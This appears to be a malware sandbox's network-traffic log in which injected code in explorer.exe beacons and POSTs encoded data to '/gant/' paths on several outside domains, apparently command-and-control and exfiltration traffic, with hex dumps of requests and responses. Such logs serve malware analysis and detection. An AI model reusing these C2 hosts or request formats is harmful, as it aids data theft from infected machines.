                                                                                                                  Data Ascii: j-Jh9P=pb2-HN2Zm0s05DzZelJI1TkAVLWVYCBBqRRqsXY1~H6RcEAcezJUQyXISwuJE4UU1J(yBvztp8(cKOVY4MbMC42tKtjkEgAtyhNJDXcNrYyuRlh2BX2hZrLESmKDeoSdaDSuEtcge2BA7rPzbM7e4XTAzgRRRrXC~BowOsGcYcEA6BY2XVXJaAGplXOHMcbBjFhgdhE2(XFHK08wN1maOvYHbI4A1xip5JO7oz~-EppFHLVSKoyOkIVXcKifhu5nBD1xE0O5ksHfs2qi5dO0sooq1-~UqiJXjTwogmE1LwLshAjyJQOrSo32v93f9H~5HigVpts_8Mdsn6DIebOqhtygADRGofytOkkrzXCYEA0pHz38bMyJKOImI1X7XXOj5n54HwXCkB9IEDGnDNdF8CrdUC8Oh4Dc1eIcphm4f1QIiH7jrfFreleANNzxcEPZwYn6JweHAEIxA_M8gHM3YiBEHMZHwggPiRtK2ZSdLQz5TW4wOdKhiOY4vwETwctta6QogyQw8sajEoWgOq8OFVKyP7zDueMy4snbfwek(saU8pn1i8~UfnYzgvwV(_NqtPXgqrmKLLO0FV9H2lj07gjPPQLc7EoDmKgxMIOV4I5fv-OGNha81s2UqE(whfutH3rcg6tHiybiXu~aw8rspYhLwY0yWJGBe0gPVrOJE-JTCF0Za7gDuHo4fS8n(KDtk6bzqOcM4wrvh2psu9IYGXh-jINORHyUMuUJeqKfz50tXOtiuBxKlLXgJVWpGDKa7XqJXwnbXJh-3XIKc0eV8Lr8QZkhsYvyBZNnYxnijVIzXqLpHh(PFAuLYGShbHvxcgxyJDTpAIRsVv6QMF~ieZsSo99R~gHhgNDQ~hRJy5(3mG16D4JNuwEHI9OMF2psVQr7re9xHxR5TsaMxf5ekEIlfTLP5bF0fBS0Htz9pQBXcGcfoAg8oLmMaUa5KGXDM9rKdLqgsEkMEjz5YB3dC5lQPmr_NcQVB3y1yrreJaW45L1Z3wdLhse3VjzLbkFodL6kKC2PC6Yl6EG_RJzUzGYOGDtcoKN1lrVcclEh~gNEpPYRn5UbpJpbyzllnPVpPKRriJXfPtAZC0jgsVHwA5NvWCdNAI06ihmdVbfov0KOuXTnDD4Gyq55K69TYzcN6PjIMPUi9pDdpX1cubX8krkCqJZiUWtsi4fUiOvD8VrLyTJRGmK5mafIqBZZQ5qaC_InL9dkB4fO0u95zw9q9z1KxcYndtTV75zi~ng45iY9SFxE7EuwrLLE1eR9sKnQA1w_zFcv8gIA2Yd4BJZsa9aTLKPm0lpte9y-fpX4V7rVtHzcvixmGKs7ecOEHu8nAOA2Y7CaxnlerQda44nCpGDAierAKvuvigPd8PxQ0ITuGXTU7FnsxOLMelkzj1pWz7nUpFh_0CCuyNlKiRPi9mDzFzSq8jG5QquexkAahwdHC1UyU3TdmItmTE0zcVQ95hP3CB~io7m2Feu2e9xK(gY3tiHoIOA_EJzM(MuwR0kbyXDhMfAMoPDnIpJ5gCOFi_547kl5WYRVvbXYo-b5xHMgaWrEqHvU(8uuYHRVxlxIjGAbkyn8T9wAmkqFt6(Hh99fuJxGTlgpfSd8shrm3l0uLxbBj5mbzatiAvBnZwF32GKdDqLtodfE9d~lfBpQmd~G3okNdOWFB1rkdOpKvrDw4AWg1MbmPlkP13377m3OpiBx9ajkOGKyeYHHtTJyjMZPWUJz0nRUq4IXkRNoNATafbNDwX21XRAn6LmohFpIvcbm~OOuPohkqlBaWqbvkZKhlp7FdVCOuE6BYarUJHKFaxbmXbHFlH7bJFpAav9WxXOi8cBCufLzVxJZWHAem75PtVVhC5BWGs09KaO6(TWxY1t9tfirJYPO16AoDxoSWeSv4k0bFHpWC-cFXwiKVeboo0AWdemDE-YQEAQjT1B5KtVgsA(TwbglrJI14zO9EGS3o6ddiaitvNVvPJlsd7Een8sxGwBkJ568QyKD9jWVogfhgCpQWMX13J2yH0iF2mORTocRfj(93oBfdffqDxycdoSyMAEzfpDSfrrvNKjFFcpMdxPkL2pZbR1V6mMktOZZDieyOqjuiWi09izJLAMhYFHeFovBV1xk70eGkxdOiJkczKRBeOTE8f8dZVbvY1iFNG96SBA_nnHBxoRqwaLw7UwxoCz0~fOx5i8oxLW-hXOJ8aWkv_gC4X2tHlWXHmZkLlwjaohBA2pGuI(_AOwq(f8CVUgFiKRLZwFyan9ETNEEHUXqEVIsrDHAL6BmBdgSAxOMt-umJUhAevXiGWra8KQofS~J2Bi6bMZpsQVZE914a-G6HO1stgN_iv9B114mhCcpAbruc6KTgxSGU9YI08xouv0DAXWb1ic8YM~8x5ffkEkyVHCdR-1QJBmj6qVvBeCAD4kDb9JXryG1J1jBjz6XSi7wLsoj(FZQekjN73LrkFLPIAZ8XAouUwcTgJpC9mQpn780WEUx0-OoV67qyF4YWiGM5KTI8RAVwOcVsNg7EaZ9YvSaHB7sT6(pUzR86hQwUx~6STzGvxXgXWSx8-Vx6mYKNGJpo0njziBmPf1iuHUQtg32pVPeQAQ6SH8sKX9LQTz3jR0fyj(ObP(fgwzdnjCFdxc20KZZnfH4CukXs8pZeEwZtNvLHpPTW7JMzZJ1vTK9R5ERc2L-BGIkBrdnRrTaXSJDjCklE6kuLPKZBT9Yi1k4WdkULrKSyL6hc82w8ZfDzMn0hIODwxL6QKYR5iI_ZcPPCkd9SLciM57LwI9RtPMFoKhU1HwQIlsNsrlF962nXG1ENdqzjKmRU6SY5BEmBl~yUkcTi2znhe8uAY3M4NM1s83OMfh_H-y0Ntc8Vgc16Qennap83p2oazKiJrz1iQ30t14GtxNJ4n0cAU(M(Pofe1gs1WIUrKfS4R8ZI1fdpA~vRNDqot4tNagu2N~isRrbNu~0DuHCPOu_iqw3L_QejZAvPD6Opx30l41AuQaYKM0KkQTvGetbTfNUgAQtEI6YYUuG48AoQydYjNr7UmhLnfPwlIZaInIqsC0HLhHS6yFF5V(V9bxTRFNoNIZWBn3gqB8UZ0wq8OdmJ_vjaiA7vFp6l-npM_iEjqzxSQQiPfr8FU0QqX9GsOEG3pgS5GN0X-8mDSu1h0OYdZ5hv3c_BMoEQCTmUp21mfN3GdbDgIa86XUc5XAdOV5-uWQhEQAsEtKttOMv3Vs7kBTSPU8lbFHGx7Ik4bG0F932(Nbrom7Ctu58ZQnTDEDNS_tjvfsqNKWhh1VhCGrT(EBP(7pOOwN7jIu7KXGvwyz-QpLm6DMEQfMDOtzkQQb6De7oEfzzdJj_dMQPBHrgFCXi5Ty6tlLV1ae8sv7oQJyWFNZTnclr0WPg4s1gQMkaNKnv0ta2NK52VtsXvEv07bOKdoVd7HxpXWxRqrgzICrDFcZJBVwdbOvwtsO9j9CAdpfYFYRJgdeM20gglEVledSpqHq7Nj5Mf_P47VODxljtd2Do1WvK4Tc2rlJ8B-o3v0G6huBaISaFApfOYl46BuahrWvRRBY9JvUFDeBlcQQId9tloTu2cX2mJhVQFcB2ZnqhhBWNlgvNsc9IwMRGTN(qaIpGW1H8Iz(zM_1TrdBX~RsZMq6mccx_g44Up7H5kOIsymaeGFJvuQIElpmhsiU7s-BtCHzVlo6Nokhu8lkLR77otjsLI3NMdX96Wvh2sFj4QBlmjc~VFYnm1Y8LJWH80ErhAEQ1YEXTiUkrwFRnRR2A~6OXNGGp3Smw(GFipFgPwKQR4z61e-frz9a0OFex0ovVeHm9lmoZjaZPBqZXf17AeLu3ENOfV0Y7j4tY(Sx2iiX_OKdJMQoomLp8Xrni81W52EaCzp~qWC2f2wJ_oe6ZHd1W(tJIUNZI3auU9gDFjE0jTuL9CB8c8QmdiUtYKSKz2IbAFrq88Uk6TNKaYI58kNiZIZZSEAq6kjWd(lV0kdqqgXNSuN5hlbhkunQJYDBmJWX9CQa1Q7J4DhCkg358mB6zsdrPlnK2q3LL9mpj1vYMQuifVhNDmQWbp5Gm(bv3NeAihW3hZ5A
                                                                                                                  Feb 13, 2023 19:01:00.054549932 CET719OUTData Raw: 78 6b 71 6b 28 75 55 74 51 6a 6f 37 69 58 68 74 42 64 68 79 76 31 6d 67 28 58 71 42 43 70 7e 64 78 65 63 6f 71 49 75 4b 46 30 39 4b 61 6b 62 69 73 4c 31 66 36 4b 74 5a 75 76 6a 62 49 48 47 4f 42 51 57 79 55 4e 39 55 4f 44 46 6e 53 44 36 4d 62 71
                                                                                                                  Data Ascii: xkqk(uUtQjo7iXhtBdhyv1mg(XqBCp~dxecoqIuKF09KakbisL1f6KtZuvjbIHGOBQWyUN9UODFnSD6MbquhrS2rLt~Sz5y7fIO8ua4CgNHL7BurMRsRcnnfepHdvmXMatN8Ve8VGM2kc9zbTEp-5jzuWawNVZIWyAdLo_q88QxO9a9kBdlyX34htLzPQUP4AYfANt2ew2VvPI2xKA60qb4Se1oZm8ryffsSl9TjdbuAOh~IwsT
                                                                                                                  Feb 13, 2023 19:01:00.217638969 CET722OUTData Raw: 4c 63 64 39 39 51 4e 70 4c 67 67 74 67 61 6b 47 6c 32 77 4d 72 74 52 4b 36 44 45 79 68 35 42 42 4c 4b 30 68 33 6a 53 71 5a 4e 28 65 73 66 37 64 66 65 45 4e 31 6b 6b 73 51 6f 41 59 6d 6f 34 73 38 36 79 34 6a 52 67 6a 34 6b 34 64 54 2d 43 53 4e 53
                                                                                                                  Data Ascii: Lcd99QNpLggtgakGl2wMrtRK6DEyh5BBLK0h3jSqZN(esf7dfeEN1kksQoAYmo4s86y4jRgj4k4dT-CSNSPnxlu61jnuJmtzuBlmU4YKLLrrzW6JIHWkywSBvaEMuFmQRns6b_PhHl27oLSeQo4Wrn1XCCiYgawG7p0xU7uFvR6mkuTLLM96hI3pGz2AQKLeN_T3vyPDhgBaiBC3fRAhJE~giVUPJv7FEax4btGRXXXZUBq1Dmb
                                                                                                                  Feb 13, 2023 19:01:00.217854023 CET735OUTData Raw: 6f 39 5a 7a 75 4f 4d 35 31 4b 54 4a 68 37 33 48 6b 5a 51 37 57 5a 77 50 47 4a 4d 48 30 30 43 74 58 50 70 54 54 52 31 5f 37 4b 6e 50 77 45 74 61 6c 55 6f 4e 32 5a 6a 73 62 76 6d 4d 54 57 34 6c 4f 69 42 36 59 6c 48 36 41 6e 72 48 4f 36 6d 73 75 50
                                                                                                                  Data Ascii: o9ZzuOM51KTJh73HkZQ7WZwPGJMH00CtXPpTTR1_7KnPwEtalUoN2ZjsbvmMTW4lOiB6YlH6AnrHO6msuPaj9S2gycFV1MqxDZV7XM2u5JGzQQOQhUFBjBShiAfAgP~ayCj-wsjwI57yzVV7DAGMjyeBszZpGO5SEmmLLLJFhBkmd9TxpHoUH0wAxoJHvOxFiitcvUKmKHCwirpxn5CsHVlLxBXu4ApctnOShFw5CNrgT8Jt9di
                                                                                                                  Feb 13, 2023 19:01:00.217968941 CET743OUTData Raw: 5a 6e 52 4a 64 6a 69 4d 61 4f 43 61 30 69 70 48 75 4a 37 63 6d 78 36 42 4d 69 51 56 6d 71 6d 61 56 62 31 56 41 55 32 6b 6d 55 74 2d 65 4b 73 75 32 5a 35 41 35 79 47 78 5a 4d 6b 44 4a 37 6f 39 79 41 53 71 64 6a 42 76 67 41 55 59 51 78 4f 48 33 6c
                                                                                                                  Data Ascii: ZnRJdjiMaOCa0ipHuJ7cmx6BMiQVmqmaVb1VAU2kmUt-eKsu2Z5A5yGxZMkDJ7o9yASqdjBvgAUYQxOH3lc3VwEBNBee9EPHGy1MPMRhH8QNUZyVC-XmBtbW8vcyHGHrOzHkUv(-gdQt~Mgfyac5a0ImEelSYAi9xwmNgk5etAV7BSJwYIUVCkDD~UdlpFsOnyxMOwOh8pgYuRBueUhnZKNsY_tQ7bEqIzfs3QEnvJrN8PkGsZO
                                                                                                                  Feb 13, 2023 19:01:00.218142033 CET745OUTData Raw: 63 76 35 52 62 31 62 44 43 57 34 47 47 68 61 4f 37 34 69 65 41 4c 45 54 43 30 63 32 45 39 68 35 54 6e 6e 47 32 4e 71 54 36 47 34 30 71 4e 68 38 51 6b 48 32 6a 5f 47 66 4e 47 4c 56 56 47 72 39 74 56 61 6b 69 46 63 67 4e 4d 6b 50 69 30 6c 33 58 31
                                                                                                                  Data Ascii: cv5Rb1bDCW4GGhaO74ieALETC0c2E9h5TnnG2NqT6G40qNh8QkH2j_GfNGLVVGr9tVakiFcgNMkPi0l3X1oZeJ7TZIq6~y~PfqNWnT07qYtB06LuIJUn~pxxlPrs6Bfxcsl10RTHAgIvjEeNZn8hWAQGOzGEqV~-3a7EztUj1tPFvTorOoJDxygRU038542azo5C5sWddsBCnCFPS5QzghG0Ip5PPdB9MeQxevCUcDjbgxoOdcC
                                                                                                                  Feb 13, 2023 19:01:00.381176949 CET751OUTData Raw: 4e 31 6e 69 39 33 38 53 50 43 4d 4e 73 63 32 45 55 75 68 77 41 64 57 33 78 44 73 35 34 62 6f 6d 46 42 54 46 37 64 4f 69 35 47 63 66 47 57 54 2d 45 6a 44 46 52 43 4c 75 47 49 52 6a 61 55 6c 48 66 37 70 48 48 4a 7e 64 56 72 34 47 42 72 59 4f 59 38
                                                                                                                  Data Ascii: N1ni938SPCMNsc2EUuhwAdW3xDs54bomFBTF7dOi5GcfGWT-EjDFRCLuGIRjaUlHf7pHHJ~dVr4GBrYOY8KP06OKoX9jRa2Tkpo2SI40VWsde_v32eAQlt7uGDhWntCr98cEPorHVmFUirPVrmlyqLiLaLBhiKLeOwTlwiW7EkBQ8cri6znPAS9jtPRAcifHnnmjXXK4V-rO3RG5QXVoHni2Iy8NSf3vN6nxoFkYelg4mahaUW4
                                                                                                                  Feb 13, 2023 19:01:00.381349087 CET759OUTData Raw: 31 73 54 62 38 6d 41 71 61 79 79 31 34 31 7e 68 61 41 74 47 65 49 6c 58 42 34 52 70 53 66 52 66 62 33 6f 6d 51 4a 6e 56 4a 4d 6d 66 70 50 6a 54 65 4b 33 41 4b 62 6d 56 33 46 77 54 33 34 41 54 62 4e 48 37 54 58 56 36 5a 35 6d 73 75 49 34 6f 74 58
                                                                                                                  Data Ascii: 1sTb8mAqayy141~haAtGeIlXB4RpSfRfb3omQJnVJMmfpPjTeK3AKbmV3FwT34ATbNH7TXV6Z5msuI4otXXKNLUOa2SZ5ZvM0vD9nv7LwVBGoJxGhnYxfOZXMDIwzHb-OYSZEzjQSkIdv4P3I52G(7QRbwFsAfkI(IE5EbvNe5yDLHU2vA58SUoeG6rwwUMbcC2Cjilne7RQI5MMuVxx6Mg9y9LK2tuNMVCcfcU2kQkKpsXaxLH
                                                                                                                  Feb 13, 2023 19:01:00.547704935 CET760INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 13 Feb 2023 18:01:00 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 315
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  18192.168.11.2049860162.241.225.6980C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:01:02.736552000 CET761OUTGET /gant/?j-Jh9P=kZeeE52Eo10vzDTOQ1ht8j81CNi5RiJJgw5DqHYq9Uu9KUllXVwDaVf8WWuhPaYSyfOYD/3vstXpbIR6gdGLFZ+mUJD/YhgA6w==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.flyshareinc.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Feb 13, 2023 19:01:02.906559944 CET761INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 13 Feb 2023 18:01:02 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 315
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  19192.168.11.2049861142.44.131.17780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:01:08.505626917 CET763OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.lakeviewautomation.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 188
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.lakeviewautomation.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.lakeviewautomation.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 6f 45 64 73 55 30 6b 56 67 41 77 2d 75 39 6c 4c 54 64 55 63 50 47 52 4a 48 71 50 73 36 2d 33 51 52 52 38 48 50 62 75 42 34 74 42 74 6a 6d 37 69 4e 36 73 58 6c 43 36 56 57 41 71 30 53 56 44 33 53 6d 4f 61 73 79 67 69 56 7a 7a 74 46 7a 66 6f 49 74 51 6b 72 76 58 34 52 4c 79 36 6f 59 62 75 53 5f 34 44 46 66 47 66 38 7a 35 50 4b 72 72 57 41 4c 65 70 53 4a 42 4c 31 73 67 30 53 75 37 50 5a 58 46 32 49 76 28 77 4d 6c 4b 59 57 75 34 56 57 72 4d 70 62 79 28 52 48 72 6c 79 5a 62 28 5a 28 77 61 36 46 41 62 45 74 6b 45 4b 4d 78 62 67 74 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=oEdsU0kVgAw-u9lLTdUcPGRJHqPs6-3QRR8HPbuB4tBtjm7iN6sXlC6VWAq0SVD3SmOasygiVzztFzfoItQkrvX4RLy6oYbuS_4DFfGf8z5PKrrWALepSJBL1sg0Su7PZXF2Iv(wMlKYWu4VWrMpby(RHrlyZb(Z(wa6FAbEtkEKMxbgtg).
                                                                                                                  Feb 13, 2023 19:01:09.064600945 CET764INHTTP/1.1 200 OK
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/7.4.33
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                  retry-after: Sat, 25 Mar 2023 11:59:00 UTC
                                                                                                                  content-length: 771
                                                                                                                  content-encoding: gzip
                                                                                                                  vary: Accept-Encoding
                                                                                                                  date: Mon, 13 Feb 2023 18:01:09 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 56 4b 6f e3 36 10 be 07 c8 7f 18 30 40 7a d8 4a b4 ec d4 eb 24 92 16 c5 02 3d 15 e8 61 17 ed 99 96 46 12 61 8a 64 c9 91 15 ff fb 82 94 15 ab 49 bb 45 fa c2 1e 4c 0f 87 1c f2 fb e6 45 5d 5f 5d 5f 01 84 df 1f 8d 39 49 52 58 fe 28 0e 08 3f 4b 1c e1 fb 81 4c 2f 04 49 a3 41 7a 18 74 8d 0e 2a a3 3d b9 a1 0a da 9c 4f 26 af 4f cc 95 d4 07 e8 1c 36 05 eb 88 ac 7f e0 bc 31 9a 7c ba 1f b4 3e a5 1a 89 57 de 7f 68 44 2f d5 a9 f8 c1 61 6d 0e e2 dd 4f 1a 19 38 54 05 f3 74 52 e8 3b 44 62 e5 74 fc 74 e4 cb c5 c5 1d 0f 9c 2b 71 c0 a3 c4 51 44 e4 01 62 5a 99 9e 8f 36 a9 8c 26 d4 c4 ad 1a 5a a9 3d 8f 64 82 f6 99 4c 62 45 8b 9c 3a ec d1 07 6c 7c 6f 0c 79 72 c2 a6 bd d4 69 40 7b 2c 36 e9 fd 96 01 9d 2c 16 8c f0 29 92 60 e5 d5 ff 8e ad 32 7d 1f c8 7d 3d a0 94 f1 58 f3 18 b6 af 09 96 f7 31 ef 12 31 a2 37 3d be 29 94 b2 32 9a fd 47 09 26 7b d1 a2 e7 8d 38 86 5b 52 ab 5b 06 3c 66 fa f5 a2 48 f3 5a 1e 41 d6 05 eb d0 99 24 da cc e5 00 90 cb be 05 ef aa a9 c2 fe d5 ec 9f 82 59 c5 bf 09 9b 50 54 b0 4f 92 30 74 82 cf d8 5b e3 84 93 ea 04 1f e3 26 68 8c 83 8f 8b 6a 62 10 5b c3 db 6c e6 4a e7 b5 3c ce 72 f0 40 a5 84 f7 05 0b 35 2c a4 46 17 7c 30 35 05 80 e8 a2 f3 06 67 c6 8b 7b 7e bf 54 19 95 3c f9 24 5b 43 90 fa 7a 96 54 9b 64 eb a5 11 40 de 65 e5 27 e3 dc e9 5b 18 f1 1b 87 50 1b a9 5b 08 e9 03 a3 71 07 30 1a a8 43 f0 92 30 e7 5d 76 46 1a 9a 6a be 40 7e 99 fd 53 a8 bb 19 b3 69 1a 8f 94 4c 1c 54 9b bc 9c ef 5e 10 b1 4b cf a1 26 56 7e ee 84 3e c0 c9 0c 31 60 7b 0c c4 ac 20 89 9a 52 f8 05 41 7c 99 2e 08 5d c3 28 95 82 3d c2 5e 54 07 f0 9d 71 a4 4e 69 ce ed df f6 43 cc 70 6f 2a 29 d4 92 c0 32 b2 6f 09 9f 58 94 6c 78 77 84 95 e9 d8 09 f2 c2 da f8 1c 78 d4 f5 07 db 19 8d c5 7a 73 b7 cb b6 db dd dd e6 fd 76 c3 ca 5c ce 1e 6b 04 34 22 99 cd 82 bc 79 62 65 ce 65 99 73 51 e6 f3 1d bd 90 8a cc c3 ed 4d b6 fa ee f1 f6 26 cb 56 61 5c ad a3 9c 3d de de ac b6 77 51 b3 0b f2 fd fb 28 4f 63 58 cd b2 a0 3f db ae 26 cd 7d d8 79 b7 8d fb 83 9c 65 51 bf ba 7f 7c 8d 0f f5 11 95 b1 f8 a7 f8 08 d5 c3 bb bf 20 19 3d 91 f8 5f 87 10 fc 17 44 e7 d4 bd 24 73 48 f3 cb ec fc 34 2f d2 fe b9 65 29 d3 4a 9d ec 07 a2 d0 45 cf 15 aa 4c db 62 6d 06 62 17 1f 86 ef 83 2f 76 af 78 52 6a 3b fb da 01 a3 71 b5 75 e8 7d 00 be 7e 62 20 9c 14 49 27 eb 1a 75 c1 c8 0d b8 08 da 33 ca d0 3d 7e 03 54 89 bc 6f 0c 09 00 00
                                                                                                                  Data Ascii: VKo60@zJ$=aFadIELE]_]_9IRX(?KL/IAzt*=O&O61|>WhD/amO8TtR;Dbtt+qQDbZ6&Z=dLbE:l|oyri@{,6,)`2}}=X117=)2G&{8[R[<fHZA$YPTO0t[&hjb[lJ<r@5,F|05g{~T<$[CzTd@e'[P[q0C0]vFj@~SiLT^K&V~>1`{ RA|.](=^TqNiCpo*)2oXlxwxzsv\k4"ybeesQM&Va\=wQ(OcX?&}yeQ| =_D$sH4/e)JELbmb/vxRj;qu}~b I'u3=~To


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  2192.168.11.2049840185.215.4.3680C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 18:59:45.026565075 CET435OUTGET /gant/?j-Jh9P=5TA3zgeHNm1wf6Thb5AMtjQQLB1qlu2Rn/MQ6MujY0wd45AEg4BITkIozYXp1KG/kBQAm1Ey7A9M4ZpJCjezXwYaBakyUBQ9Vg==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.gargaloid.ru
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Feb 13, 2023 18:59:45.089783907 CET436INHTTP/1.1 301 Moved Permanently
                                                                                                                  Server: ddos-guard
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: __ddg1_=CTP6ZfEWKLVZFJeB7zBE; Domain=.gargaloid.ru; HttpOnly; Path=/; Expires=Tue, 13-Feb-2024 17:59:45 GMT
                                                                                                                  Date: Mon, 13 Feb 2023 17:59:45 GMT
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Content-Length: 364
                                                                                                                  Location: https://www.gargaloid.ru/gant/?j-Jh9P=5TA3zgeHNm1wf6Thb5AMtjQQLB1qlu2Rn/MQ6MujY0wd45AEg4BITkIozYXp1KG/kBQAm1Ey7A9M4ZpJCjezXwYaBakyUBQ9Vg==&T9=bPxTYTKdI2
                                                                                                                  X-Host: www.gargaloid.ru
                                                                                                                  cache-control: max-age=0
                                                                                                                  cache-control: public
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 72 67 61 6c 6f 69 64 2e 72 75 2f 67 61 6e 74 2f 3f 6a 2d 4a 68 39 50 3d 35 54 41 33 7a 67 65 48 4e 6d 31 77 66 36 54 68 62 35 41 4d 74 6a 51 51 4c 42 31 71 6c 75 32 52 6e 2f 4d 51 36 4d 75 6a 59 30 77 64 34 35 41 45 67 34 42 49 54 6b 49 6f 7a 59 58 70 31 4b 47 2f 6b 42 51 41 6d 31 45 79 37 41 39 4d 34 5a 70 4a 43 6a 65 7a 58 77 59 61 42 61 6b 79 55 42 51 39 56 67 3d 3d 26 61 6d 70 3b 54 39 3d 62 50 78 54 59 54 4b 64 49 32 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
